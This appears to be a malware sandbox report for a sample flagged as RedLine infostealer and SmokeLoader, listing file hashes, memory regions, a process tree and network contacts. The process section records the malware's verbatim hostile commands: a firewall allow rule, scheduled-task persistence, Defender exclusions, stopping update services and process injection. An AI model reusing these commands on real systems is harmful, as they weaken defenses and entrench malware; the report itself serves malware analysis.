SHA256 c4c489450d13643e69512d330469078ebcd6d543d09d1be3f87afb551204dc41
SHA512 ca87d2db833f734ff6488f1f820b2f28381b39c23372af64011d5443d28fa77470dbd157085ac029bf60db4faff6bf89edf048ff2e9f753e261196b25a06da10

\Windows\rss\csrss.exe

MD5 c7a6f7f4b2d3357a411a9d1b8bc8f100
SHA1 908106b40f51d4b0396c0d3dd2975a9546eaf3c3
SHA256 4d431bf57c65b1785ce67bb610565725d921683887ac4e16121ff0740a7d9a51
SHA512 ca0076089a6574b0f565b68e33d7fc402a475c8da2287502360f0541b7a8e447693c54f0ad7801daa1a62b6de232867f8bc409603808f2d45f6dcc3beb18e50d

C:\Windows\rss\csrss.exe

MD5 debe44b6de2e6d30e377cf340477f2d4
SHA1 363cde468ab83a60f4ae89e9511e4479d30a8fd6
SHA256 9f07361108f10a6f0ffe341cc19c3b258173cac24552c48b5c4a614450172eb6
SHA512 f85ef3f1afcd45e28baf294fd26d7db32298ada83284239f42e0acbbdc5e3753bb6dcf44996d3b81e0a1c96c2f048968685638dd9a20ef1141499a772d88e68c

memory/1092-158-0x0000000000400000-0x0000000000D1C000-memory.dmp

memory/1092-159-0x0000000002540000-0x0000000002938000-memory.dmp

memory/2032-160-0x000000013F750000-0x000000013FCF1000-memory.dmp

memory/1176-165-0x0000000000400000-0x0000000000965000-memory.dmp

memory/744-173-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/2276-174-0x0000000074360000-0x0000000074A4E000-memory.dmp

memory/2556-175-0x00000000025E0000-0x00000000029D8000-memory.dmp

memory/2556-176-0x00000000025E0000-0x00000000029D8000-memory.dmp

C:\Windows\rss\csrss.exe

MD5 7b7ff8f69d5ea48fdff10c28510b3560
SHA1 7fcd80f798bebea4f832f915e2e481f910591878
SHA256 df07e2d0f2441051a2c2bd8a2df2c41fea065f89158f2cdd2b26363db2cff439
SHA512 3a134bb3d9faee3c781cd5dcc4026e295ca7f95c8e060a4c80cf5026a6fb2797dbd68e3f8794d20a4819479c4d7af2f720bad02ce3c1695dae39ed0b51fb3a4e

memory/2556-178-0x0000000000400000-0x0000000000D1C000-memory.dmp

\Users\Admin\AppData\Local\Temp\csrss\patch.exe

MD5 bb8365750cef0353e8fbed42e2412d73
SHA1 b3dd4f3d1c70fd87ac48c3a13c73641720b29756
SHA256 88dbb1cd7cb2e7902456a152c125b72602f477d2495f29e02dd445fd991647a3
SHA512 ebc9ab3971821a93c783b3995a39f86383c07af424806587d2e0f7d13b2e9bd40777318b809f3ed3fdcb677a77744879ecfbd3dd4073f0025a654076aba9eb84

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

MD5 262cb6210af95976f0f466c45132558e
SHA1 b6377f782320dfcb79274d1ede05ce6ea46cf941
SHA256 364e107c5a2c9c53cb07e598f320cb86fc70012c2a2c84e295026adfb0fb47cf
SHA512 2edb1ade02d8c3e24301132d205791add975f0aa961758c37589c30070c3b399395a84c5ac27a8fd5017887da2af0a17294994129fb56ed65687141e5347413d

memory/2496-184-0x0000000140000000-0x00000001405E8000-memory.dmp

\Users\Admin\AppData\Local\Temp\dbghelp.dll

MD5 121cc42a218fe1856f3dd72720d3386e
SHA1 6a5ebba8c315f2ab12e349b2ca58008a2d4ddf25
SHA256 66174927bc4cb02b6139eb3e50b75a8e056c4682b2dbc2d8733ff7ff64b7b044
SHA512 f3ee67c55c254803b950f41beecd00587368624d0ccc8c33f24861e09fd12a1ca3d6189c7b8f168deb759b6765c865d36485470122fd05445dddfee42ca0a5fe

\Users\Admin\AppData\Local\Temp\symsrv.dll

MD5 c269550cb3402a71e5d435f151950eb7
SHA1 669dfb09f64cc9aac79c38a12ac246d6b40abf5b
SHA256 5ba06faf5ae60d5546d6effcb4a00a7826aa83de35abd17f6940fbdafecaf225
SHA512 ae2280727ae085cf47bbd8d6e4c8a6dfe0f0a75363118393a2b8c9a2d3feb7d2009810539342386a122dd4cc572a36c151e9a035eeb00e83fd62e6f9b11dbad5

\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 57c526e1b90874b0efb5aef8aa235ceb
SHA1 1a51d0debe66bf906abc3450c97caad069b5e760
SHA256 4905e9fedaa3a45f21f9e567118a922b0d2729f6ea9730c4bbfc3d1e94de8c83
SHA512 5a79376a7536002b0c15e3afdd204d6610ae07300fa96367a35041c8b0f1d864508ece42ac9f7dd34aea0b9fef92b2f18af844871fa7cefdb3a5eca7f8e87d00

C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 b862760f5a977e1e0b2e96b05c227a41
SHA1 d9ba668f098060aabf8cff812bc5dd911b689b86
SHA256 70529d24f77cc182156351e6b0cb002cf8491e7c59c5771ca0196f83eb0c8e08
SHA512 7712a94f836654de112e1b3abcfad8906160c58c0a7dfd48b07cc81e19cd419d1e8a4ee62cdcaa941ccc78aa32de2e0889a748f039e4b0e6a531681fd7602473

memory/2496-198-0x0000000140000000-0x00000001405E8000-memory.dmp

\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 ff3d60814376e660e4f9c525cf1c2107
SHA1 55c1a7f0d829832f0053c0b733ed0fd257b11c6c
SHA256 05ba1fc2d61a2fb21079490a3c1192ebefcfc6943062d4b2c626e59405e2e8e2
SHA512 34e0af65169cb109cd5e680e14e916453021b5e1975087e36a250d37fe68705b19256f3590c2da7d88224b3d052041cefb31700cf6d1d64981a0dc62b880ee4d

\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 3aa71117b51b169f6cf001c0eeeb3107
SHA1 d53fb9153726d0c283d7e51a374b9111bd08e4f9
SHA256 70e59263d5c6d621e3470c887f4de99debc3f36b0807111151a9bf313e838d2e
SHA512 2a820c0e278c1204e5778d60546d6c5dec536e1ab5526b9fc61bd2e5b7547d5bed50339dacc9da6b328f138a4b23933e225e570bc178bf086bfae5016a5614f9

\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 6774bc6e111bffad992bf95cb23e4c2b
SHA1 a5e223fd534a896ff88c0629ddb1f4bcfa360e28
SHA256 f93d69e8633a58e41688755001d49dcf4e7f1bd4fb32ce87e315c5f5474f9694
SHA512 9a36d42033b0887910daa90412dd409c707ad685c52e48a9be197e4f4f1a78cf7680feb9f996e6cf6b6c199c10072183bc423d4f28c40a5bf084a2dcbc03f810

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 3d02a3a60096e985574c026b9a4c74e5
SHA1 2b2cbb3e69f554cc1df1c260e09c7fae7a3cf37b
SHA256 b0ad45b2174b1c390bb6b8312d1f1daf0762ddf8d33ba6516e12c30d75757424
SHA512 5a5901b557528d708bd696641e982186986206ea9bfff94b2d2d943574f2b88ced6da071769b784ce2a9cc428a8bd40e7da34feb51d03ed58f6fcf3b8e74064b

C:\Users\Admin\AppData\Local\Temp\CabC86F.tmp

MD5 f3441b8572aae8801c04f3060b550443
SHA1 4ef0a35436125d6821831ef36c28ffaf196cda15
SHA256 6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf
SHA512 5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 5c0583c1d871d4c19502f5a6f960e46a
SHA1 7abd20798d88a47dacfa8522f8f841ce69cf7304
SHA256 99fef05fa776521fa0c2526979adfe52db80a3bb5f2138bf2705ebdeabe2a4c3
SHA512 4c8546219c092faae29b833fa966fc16c5e0d9ede08772675cbef38544a1ff1573ee8bcbb335bb1b8021acb50621c063501599f30838126148bbcfaf5605bf70

C:\Users\Admin\AppData\Local\Temp\TarD2F2.tmp

MD5 0f9e36b042e047dd3ee653d7a8a07c19
SHA1 6f99dea388ba4c85d5098f855b4921b5fbb32a0f
SHA256 41e0f9d40f47e84099a5ae7e1d8ad2e99c75450ff19b5f84e477642b7527aec9
SHA512 4d1bc2bc5ff827edb2f78da58ae3f90e5e527bd450c5dd7989d820551e7bb9c1382b72de61a85a3393fb15c74d6a995314565a25125b1842ee9c6579b0ee87cb

memory/2556-259-0x0000000000400000-0x0000000000D1C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\EACF.bat

MD5 55cc761bf3429324e5a0095cab002113
SHA1 2cc1ef4542a4e92d4158ab3978425d517fafd16d
SHA256 d6cceb3c71b80403364bf142f2fa4624ee0be36a49bac25ed45a497cf1ce9c3a
SHA512 33f9f5cad22d291077787c7df510806e4ac31f453d288712595af6debe579fabed6cdf4662e46e6fa94de135b161e739f55cfae05c36c87af85ed6a6ad1c9155

memory/2556-275-0x00000000025E0000-0x00000000029D8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\F442.exe

MD5 cfc8b7c4e24433565ef8ce4cf14e4313
SHA1 13e63fc565678ea4bf0180c1b09aca10db04228a
SHA256 2a2cd2df44b3dfaa76dea405e3cab1592a4e43da7e9ac5ceace29198f7160042
SHA512 0aa3fc01bc40c30014886a3e0d4dd9f50f4216ad06a0137463079515ebdac2f212d248808f0e410882fb6b702e54f7c810554e928c1a26b88208aac0c6bd1d2a

C:\Users\Admin\AppData\Local\Temp\F442.exe

MD5 e2130d83aff627eb4289bf51b1998d34
SHA1 44951fad9e38885d79a4ce3ce198dda00de0d017
SHA256 3491290576d1b6bb68fb2585e96983b1ac43844a790750b5cf38c89787fb9f0a
SHA512 5cc02d78c6f1e04efd259af8a4b09cdb1ad57c5d03c451a34800fbbf41762b8b606c8780b17f749cbe87cb95b79e6748934f98c3673b198d1a416edf17221363

memory/2144-282-0x0000000074080000-0x000000007476E000-memory.dmp

memory/2144-281-0x0000000000B00000-0x00000000010B2000-memory.dmp

memory/2144-283-0x00000000052E0000-0x0000000005320000-memory.dmp

memory/2032-298-0x000000013F750000-0x000000013FCF1000-memory.dmp

memory/1584-301-0x0000000002350000-0x0000000002358000-memory.dmp

memory/1584-299-0x000000001B040000-0x000000001B322000-memory.dmp

memory/2556-303-0x0000000000400000-0x0000000000D1C000-memory.dmp

memory/2556-304-0x0000000000400000-0x0000000000D1C000-memory.dmp

memory/1584-306-0x000007FEF4B60000-0x000007FEF54FD000-memory.dmp

memory/1584-307-0x00000000023FB000-0x0000000002462000-memory.dmp

memory/2304-315-0x000000001B0B0000-0x000000001B392000-memory.dmp

memory/2304-316-0x00000000023D0000-0x00000000023D8000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-12-11 03:21

Reported

2023-12-11 03:23

Platform

win10v2004-20231130-en

Max time kernel

98s

Max time network

100s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ac026bee297cb9c7852863cb13154b84.exe"

Signatures

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Deletes itself

Description Indicator Process Target
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\A43F.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C55F.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\ac026bee297cb9c7852863cb13154b84.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\ac026bee297cb9c7852863cb13154b84.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\ac026bee297cb9c7852863cb13154b84.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ac026bee297cb9c7852863cb13154b84.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ac026bee297cb9c7852863cb13154b84.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ac026bee297cb9c7852863cb13154b84.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3324 wrote to memory of 232 N/A N/A C:\Users\Admin\AppData\Local\Temp\A43F.exe
PID 3324 wrote to memory of 232 N/A N/A C:\Users\Admin\AppData\Local\Temp\A43F.exe
PID 3324 wrote to memory of 232 N/A N/A C:\Users\Admin\AppData\Local\Temp\A43F.exe
PID 3324 wrote to memory of 4572 N/A N/A C:\Users\Admin\AppData\Local\Temp\C55F.exe
PID 3324 wrote to memory of 4572 N/A N/A C:\Users\Admin\AppData\Local\Temp\C55F.exe
PID 3324 wrote to memory of 4572 N/A N/A C:\Users\Admin\AppData\Local\Temp\C55F.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\ac026bee297cb9c7852863cb13154b84.exe

"C:\Users\Admin\AppData\Local\Temp\ac026bee297cb9c7852863cb13154b84.exe"

C:\Users\Admin\AppData\Local\Temp\A43F.exe

C:\Users\Admin\AppData\Local\Temp\A43F.exe

C:\Users\Admin\AppData\Local\Temp\C55F.exe

C:\Users\Admin\AppData\Local\Temp\C55F.exe

C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe

"C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\Broom.exe

C:\Users\Admin\AppData\Local\Temp\Broom.exe

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\tuc3.exe

"C:\Users\Admin\AppData\Local\Temp\tuc3.exe"

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Program Files (x86)\xrecode3\xrecode3.exe

"C:\Program Files (x86)\xrecode3\xrecode3.exe" -i

C:\Program Files (x86)\xrecode3\xrecode3.exe

"C:\Program Files (x86)\xrecode3\xrecode3.exe" -s

C:\Windows\SysWOW64\net.exe

"C:\Windows\system32\net.exe" helpmsg 1

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\system32\schtasks.exe" /Query

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 helpmsg 1

C:\Users\Admin\AppData\Local\Temp\is-34MKO.tmp\tuc3.tmp

"C:\Users\Admin\AppData\Local\Temp\is-34MKO.tmp\tuc3.tmp" /SL5="$7005E,8423542,54272,C:\Users\Admin\AppData\Local\Temp\tuc3.exe"

C:\Users\Admin\AppData\Local\Temp\C8BC.exe

C:\Users\Admin\AppData\Local\Temp\C8BC.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 1140 -ip 1140

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1140 -s 332

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\3467.exe

C:\Users\Admin\AppData\Local\Temp\3467.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\55AC.bat" "

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 8.8.8.8:53 208.194.73.20.in-addr.arpa udp
US 8.8.8.8:53 23.181.190.20.in-addr.arpa udp
US 8.8.8.8:53 233.143.123.92.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 104.241.123.92.in-addr.arpa udp
US 8.8.8.8:53 119.110.54.20.in-addr.arpa udp
RU 81.19.131.34:80 81.19.131.34 tcp
US 8.8.8.8:53 34.131.19.81.in-addr.arpa udp
RU 185.172.128.19:80 185.172.128.19 tcp
US 8.8.8.8:53 19.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 176.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 50.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 180.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 217.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 32.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
RU 81.19.131.34:80 81.19.131.34 tcp

Files

memory/4828-0-0x0000000000400000-0x000000000040B000-memory.dmp

memory/3324-1-0x00000000031F0000-0x0000000003206000-memory.dmp

memory/4828-2-0x0000000000400000-0x000000000040B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\A43F.exe

MD5 f88edad62a7789c2c5d8047133da5fa7
SHA1 41b1f056cdda764a1c7c402c6fa4f8ab2f3ce5f9
SHA256 eb2b1ce5574096b91eb9e0482117d2518ab188c0747a209dc77e88d30bb970dc
SHA512 e2d5b0ace5dfd3bd2321b2a42b7e7725071ca440389dc5ef12720a34727ae84c2907cd7befeae5d53568d9deaee8443f4cbda44b598cfc9b6316d9389be09a60

C:\Users\Admin\AppData\Local\Temp\A43F.exe

MD5 bc52f88c34b6ae291e8b6663324f329c
SHA1 743f20d92a0f677c657c5e40498139e8240c5b0f
SHA256 4ef37149ef6017a4e6c9d52883d4324b1874a5e971859b0b88d8110493081af1
SHA512 b1dd843334054b475d56550a9f38e8423fce2de8db7f67545067f952c545116868066e04d463ddcf2ed5547f95ae99844137f7f33fee3c37ce415c7cb2bb21f5

C:\Users\Admin\AppData\Local\Temp\C55F.exe

MD5 de3059ad71472d163b85695cd896ad02
SHA1 7a3a7150dafbe43328cd979d5f71f5748dd05a39
SHA256 5aca67dad56b8d5ed6cae1a444fb4b762c4b3de8fed3a0d4b68dc3eb3a3aebc7
SHA512 67b4d503427d2f9b744a251ba5cff904aaafe7ad4dcb53eb60c976e8b532edd6c1b02ae422abef8c2acfc85724e7e45b34c183d381f5209e0c2a8a2e9b55aea7

C:\Users\Admin\AppData\Local\Temp\C55F.exe

MD5 bc91e96f514894a1008b1849072639c9
SHA1 3e458721081bbd5c4cae5e5d8bca232c2990df9b
SHA256 372b90e1bcd2a850411cbe6095151b67c64e0aa9e3127ab0a7d43e4afb9825e4
SHA512 d718b59b069c93319d7ded7f9a4b56383a20d5252cfb81e6c6caedd17a4c72bda9e101a833fadba133c45f61d8e1cb864910a3831088a76359bf6537258e8d68

memory/4572-16-0x0000000074F60000-0x0000000075710000-memory.dmp

memory/4572-17-0x0000000000950000-0x0000000001E06000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe

MD5 481ac22d95806feeeecd3d94b1d4d2a8
SHA1 349ba99761f3e977db92e012150a238244c2a61d
SHA256 a32e6e1de00a1f6606f50fec3fd04454f3fab85e92773a2edb0a6b4daf9dc370
SHA512 b6046fcd80a38aded58ac327e53fbb6bec3588772c27f440d80c13d706d6f369526fdca1af7728b0b95401994a6fddb095959025bd91c00989164b2f62bb1f26

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 197e5333d921a866a75cc0db08cb4b84
SHA1 9fac71e628b619ea7191dfda5680d1cc36e03a89
SHA256 eb4ba227d21681eaaff40642c967fdd59791f0e340814db793ae447683f29aed
SHA512 f18886e72bf4cd39a136ab3073ada5eedabdd720f7d1aa14d70e5b35e2d69387fd2725ccaba20fffe0c4d9f9f43b5ca02afb3a31b959085a9a6a2d4273bef570

C:\Users\Admin\AppData\Local\Temp\C8BC.exe

MD5 b9d023b8fc6eaa8af6ce1f60fa93c3ee
SHA1 d741c64ca0f530ffa72b63cfb4c011968833f3ca
SHA256 ecf1a98ec323317b307f8ff8810d6733031db7ad67113c06031f5812dc39945b
SHA512 1c1f3e35b48100ffd20a7f4450f22148074004d30de0d4c7d6fbf4835d064babfa3e12639f6416926374ef1871dbc3b17f8f8db15509fe5f003c976ba1880e5d

C:\Users\Admin\AppData\Local\Temp\C8BC.exe

MD5 4cf64f36cb814799a9f088295c4573f4
SHA1 342240cdfb7927efff377b5b7fd68fc62ae3990d
SHA256 0edd6866f02695fe48d77e693897ac0b82ba6fb2b9cee148989d341093cdf97f
SHA512 5e960eee7ca4a1f196366cbdf6adcf9fbc623903e01e41ba88e40d5b8cca262c1c03b4ab31ca84669ed817c9044aca91ab08618c97ad1462b79650325a4e76c1

C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe

MD5 c0a98c0d33a603c3f24cbdd0fa50c499
SHA1 7c73dbc17d3f585c86a34b89ddd18f250cc4187b
SHA256 81fc9d3f885d155a2e260186ccdcd711fe98e389c9199fa8e46e73226dd32e11
SHA512 ec785c440b7fc4985b14d1287cb9aad2c13ee90cae17f01dcc8cabc51faf03970148d9796f81e6887316976d1c38b533827c7f3bf4c653166e0aa3403948ad35

memory/4820-41-0x0000000074F60000-0x0000000075710000-memory.dmp

memory/4820-44-0x0000000000060000-0x000000000009C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Broom.exe

MD5 0e50b88931ae14c42d3433f44a7a5f11
SHA1 aa3674610d4ff8a51ab5c8e7d1ee69fb11a3186c
SHA256 f44895d73a24d8416b8be682d4f8367fbcd2a2003be63c24576110ea707afeab
SHA512 178d2cf5e84a050d46f8e311640a5298249c1401126445b8b4504d88b99373108008162b54eef205237be1b0d0e7a8e9dbf2506f160e02b3acff9af27836b130

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 de6518d7f9a91c5303860c266b98f583
SHA1 9021678c990ed643eb50ec123a6163a56140536f
SHA256 796dd8a6c18712827ece2517b25f7333346523552375a76c34d2ea3f4ad0d59c
SHA512 a80d1b2a0447bde24545d5413b3f5c332afdb3ba5b692c4105f40a2c92f60e81abffca12dad574ed2ea8238a360672ac4807a14f993beb44412ef48e51b6f9c1

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 c79ec6fca44abf8e5a6bc73cf75baf35
SHA1 e2d165222c6ee3bf72ebfb4fa0a1643a8314bf42
